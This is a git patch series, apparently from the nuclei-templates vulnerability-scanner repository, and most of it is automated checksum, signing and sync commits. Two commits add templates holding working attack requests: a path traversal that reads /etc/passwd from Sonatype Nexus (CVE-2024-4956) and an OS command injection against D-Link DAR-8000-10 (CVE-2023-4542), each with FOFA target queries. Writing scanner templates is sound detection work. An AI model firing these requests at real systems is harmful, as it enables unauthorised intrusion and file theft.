ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:83af1dc90702df15b465bfb26d269eb6821879d1 +templates-checksum.txt:9a3f5794cd87bbf6dd7263091a7856123bed136c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c536c55df885aebf46a5a1f2f809d91c0eb490e6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:49:19 +0000 Subject: [PATCH 1214/1768] Auto Template Signing [Thu May 23 05:49:19 UTC 2024] :robot: --- http/exposed-panels/microfocus-lifecycle-panel.yaml | 1 + http/exposures/logs/elmah-log-file.yaml | 3 +-- http/technologies/microfocus-iprint-detect.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-lifecycle-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml index 8b67bcf5bf..3ac49b36dd 100644 --- a/http/exposed-panels/microfocus-lifecycle-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -35,3 +35,4 @@ http: group: 1 regex: - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' +# digest: 490a004630440220758324cb4cece38090221807411012b6414e7a7729f640252d7b6a10d86b4c0602202f1bbeb2e1678a36e27b99fd4fd3e9a355d303f66ac8b76e11278764fb694520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index e917652778..643e13220e 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -33,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022041713d43c8599e2c01d09ef6c0cc98279b9480702f417395ce30e008679c2f890221008ca2a38749c9eeeb1c8a9ad56ae4a3425e0fc15e26b343eae714e798e222dd5e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008a7f805258e2f9a89c6299ec951b56b46def018df7f37c2d78c43e58b5a95073022100f8859a41f2bae3ab249c313d586d1b11214f0d82728cd94b0ae57e967caa034d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microfocus-iprint-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml index 2ace39fa15..bde012dc46 100644 --- a/http/technologies/microfocus-iprint-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -32,3 +32,4 @@ http: group: 1 regex: - '(?i)/welcome/css/core([0-9]+).css' +# digest: 4b0a00483046022100921c5db244930261b6ff309507cc3c59d04a95b5c6bd4ee6dbf7a976efc056f9022100c763c232c6e0063fa9870f97ae6d91ffeef60da3cead4fe2e61cd8acc9d5a59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 18b288415cc0e116feb17500457f8cf8c9eddba1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 11:54:19 +0530 Subject: [PATCH 1215/1768] Create CVE-2024-4956.yaml --- http/cves/2024/CVE-2024-4956.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4956.yaml diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml new file mode 100644 index 0000000000..61890e2fc4 --- /dev/null +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-4956 + +info: + name: Nexus Repository Manager - Local File Inclusion + author: ritikchaddha + severity: high + description: | + Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + metadata: + verified: true + max-request: 1 + fofa-query: title="Nexus Repository Manager" + tags: cve,cve2024,nexus,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From dae34a982cf5ac54bff8e22d522fa0d374eb7e1c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 12:00:22 +0530 Subject: [PATCH 1216/1768] updated matcher & info --- http/cves/2024/CVE-2024-4956.yaml | 27 ++++++++++++++++++--------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 61890e2fc4..a033fb849a 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -1,14 +1,25 @@ id: CVE-2024-4956 info: - name: Nexus Repository Manager - Local File Inclusion + name: Sonatype Nexus Repository Manager 3 - Local File Inclusion author: ritikchaddha severity: high description: | Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + reference: + - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg + - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-4956 + cwe-id: CWE-22 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: sonatype + product: nexus fofa-query: title="Nexus Repository Manager" tags: cve,cve2024,nexus,lfi @@ -17,12 +28,10 @@ http: path: - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 + - type: dsl + dsl: + - regex('root:.*:0:0:', body) + - contains(header, "application/octet-stream") + - status_code == 200 + condition: and From 4144228bb89b0748953efb6e8e12bf9ef456b0c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 12:03:58 +0530 Subject: [PATCH 1217/1768] Create CVE-2023-4542.yaml --- http/cves/2023/CVE-2023-4542.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4542.yaml diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml new file mode 100644 index 0000000000..ebbab4d363 --- /dev/null +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-4542 + +info: + name: D-Link DAR-8000-10 - Command Injection + author: pussycat0x + severity: critical + description: | + D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection. + reference: + - https://github.com/20142995/sectool + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-4542 + cwe-id: CWE-78 + epss-score: 0.00067 + epss-percentile: 0.29155 + cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* + metadata: + vendor: dlink + product: dar-8000-10_firmware + fofa-query: body="DAR-8000-10" && title="D-Link" + tags: cve,cve2023 + +http: + - raw: + - | + POST /app/sys1.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + cmd=id + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From 426fd4de9b2bbddd72ff6d69d82e6348c5737875 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 12:50:58 +0530 Subject: [PATCH 1218/1768] Update CVE-2023-4542.yaml --- http/cves/2023/CVE-2023-4542.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index ebbab4d363..fa8f8bb012 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -22,7 +22,7 @@ info: vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" - tags: cve,cve2023 + tags: cve,cve2023,dlink http: - raw: From 41fedfe1b9001410da1c70c6d2996e509b4f0b8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 14:17:36 +0530 Subject: [PATCH 1219/1768] minor update --- http/cves/2023/CVE-2023-4542.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index fa8f8bb012..b1043fadab 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -22,6 +22,8 @@ info: vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" + verified: true + max-request: 1 tags: cve,cve2023,dlink http: @@ -40,7 +42,6 @@ http: part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and - type: status status: From 5249ce12ef52c3d5c079b1cc2351726f91f12187 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 14:21:23 +0530 Subject: [PATCH 1220/1768] minor update --- http/cves/2024/CVE-2024-4956.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index a033fb849a..b7acda2a48 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -9,11 +9,15 @@ info: reference: - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 + - https://support.sonatype.com/hc/en-us/articles/29416509323923 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-4956 cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.10128 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true From 2451f73310e54dd43fc2da2ca92855d510962de1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:52:18 +0000 Subject: [PATCH 1221/1768] Auto Generated New Template Addition List [Thu May 23 08:52:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 231cf768e5..8a2d8bda60 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml +http/cves/2023/CVE-2023-4542.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2023/CVE-2023-6065.yaml From c74c3df5ab9fdc887e0ff428927b7f18d6b4d677 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:52:28 +0000 Subject: [PATCH 1222/1768] Auto Generated Templates Checksum [Thu May 23 08:52:28 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0bdc50aa97..ae04e62605 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3169,6 +3169,7 @@ http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e +http/cves/2023/CVE-2023-4542.yaml:c59a3e80096fd2edf4b7144eafb18aa5c4ff0cb8 http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -4055,7 +4056,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 -http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 +http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 @@ -4878,7 +4879,7 @@ http/exposures/logs/darkstat-detect.yaml:27249feadc758fe3a1febc93221581a4cd949f3 http/exposures/logs/development-logs.yaml:7ac242fe7f0381b896abdb10d387c98e93b3dc97 http/exposures/logs/django-debug-exposure.yaml:abd2a8bf74edb70e893b6cc3ad872f30072a32b5 http/exposures/logs/dozzle-container-logs.yaml:06ff374b87484f1f2020b179c702d0699b18a420 -http/exposures/logs/elmah-log-file.yaml:031fff182953ca9b4f82344c7d2d1b563695ccf6 +http/exposures/logs/elmah-log-file.yaml:c722d2016a3cf6d7d8cd8caac1c43ff3908906a1 http/exposures/logs/error-logs.yaml:cef1a514b4c2862367f9f7512120ca223ad31d51 http/exposures/logs/event-debug-server-status.yaml:87345798d5bc327bbef0b0dbc13d5aff09eb65e2 http/exposures/logs/exposed-glances-api.yaml:687cfc585e23fb4f129877f77d06f7b92fadec63 @@ -6832,7 +6833,7 @@ http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 -http/technologies/microfocus-iprint-detect.yaml:f4da103b97937df82192da15635df1182c970505 +http/technologies/microfocus-iprint-detect.yaml:df5539cd5c633a1265685ad5054f3427450030e7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d @@ -8551,7 +8552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9a3f5794cd87bbf6dd7263091a7856123bed136c +templates-checksum.txt:e84e8a0e4cb5322d9c376fb67af6120f6725cbe4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a43f62dbc12fb087f485015ab8a83c6fd4bced02 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:53:05 +0000 Subject: [PATCH 1223/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 542807e327..833df06318 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-44813.yaml' + - 'http/cves/2023/CVE-2023-4542.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2023/CVE-2023-6065.yaml' From 1dbcf8903efe570032f71315d6eb350a9eb42a97 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:54:11 +0000 Subject: [PATCH 1224/1768] Auto Template Signing [Thu May 23 08:54:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4542.yaml | 1 + http/misconfiguration/installer/forgejo-installer.yaml | 1 + http/takeovers/flexbe-takeover.yaml | 2 +- 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index b1043fadab..3d03d31d2d 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100dc92305d342eed9bff2b49941c87cd9a974ab188c2908ff7bd7f23c4c8f0e2b70220122a54ccac0cf268d09ddecb89e8e8ac1b923dda7db8174e58415bb32e9aaea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/forgejo-installer.yaml b/http/misconfiguration/installer/forgejo-installer.yaml index 707efcffd5..55f0d25b50 100644 --- a/http/misconfiguration/installer/forgejo-installer.yaml +++ b/http/misconfiguration/installer/forgejo-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022033d288afaf105c2c51b6caa2184977e99105303723002afee18dbc96e89b683c0220446273c73b9aff128d57d698379cad97fd8831fb899c195f954134728e652055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index befd9427aa..3abeffd414 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 07b89e5a94e5e345e5120ed1fb1fa6e73d87bfcf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:54:17 +0000 Subject: [PATCH 1225/1768] Auto Generated New Template Addition List [Thu May 23 08:54:17 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 8a2d8bda60..cd91d16988 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml +http/cves/2023/CVE-2023-36284.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml @@ -12,6 +13,7 @@ http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml http/cves/2024/CVE-2024-33288.yaml +http/cves/2024/CVE-2024-4956.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From c73d04bef72e8b10572f9d8ac0c455d6087e3a61 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:54:33 +0000 Subject: [PATCH 1227/1768] Auto Generated Templates Checksum [Thu May 23 08:54:33 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae04e62605..45e79bfa68 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3076,6 +3076,7 @@ http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 +http/cves/2023/CVE-2023-36284.yaml:31cd0a9c8a9cef3a610f7481f8c2eb08a6e72161 http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 @@ -3301,6 +3302,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b +http/cves/2024/CVE-2024-4956.yaml:8fdaa2998b1f62c6e8fcfce8b198fa940cb2572f http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8552,7 +8554,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e84e8a0e4cb5322d9c376fb67af6120f6725cbe4 +templates-checksum.txt:913f630fde1f2c06c856ce79687ccd1f699ebd05 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e00272178ae9f1d24af8a22a52f4646f7a5fac52 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:55:02 +0000 Subject: [PATCH 1228/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 833df06318..2da568ff08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cnvd/2017/CNVD-2017-06001.yaml' - 'http/cves/2023/CVE-2023-29827.yaml' - 'http/cves/2023/CVE-2023-35158.yaml' + - 'http/cves/2023/CVE-2023-36284.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-44813.yaml' @@ -17,6 +18,7 @@ on: - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/cves/2024/CVE-2024-33288.yaml' + - 'http/cves/2024/CVE-2024-4956.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From b2f108c4abfe0ce26d8082e0e0b05dac7b202a4e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:55:25 +0000 Subject: [PATCH 1229/1768] Auto Generated New Template Addition List [Thu May 23 08:55:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd91d16988..cae8693827 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/misconfiguration/installer/qloapps-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml http/misconfiguration/installer/wiki-js-installer.yaml http/misconfiguration/installer/xbackbone-installer.yaml From 97bac1461924bdf3d80011b1922d48d46d9dced8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:55:32 +0000 Subject: [PATCH 1230/1768] Auto Generated Templates Checksum [Thu May 23 08:55:31 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 45e79bfa68..06d2d909fe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3170,7 +3170,7 @@ http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e -http/cves/2023/CVE-2023-4542.yaml:c59a3e80096fd2edf4b7144eafb18aa5c4ff0cb8 +http/cves/2023/CVE-2023-4542.yaml:d7b83fe18ec05683bd8001dcb749dd505d93c3ff http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -5411,7 +5411,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/forgejo-installer.yaml:7bb822ad620aba636554fd7151554a76b8bfa48a +http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -5467,6 +5467,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/qloapps-installer.yaml:2b6a9b4c991d5c1590fe3e66ecee08adbbcf655e http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 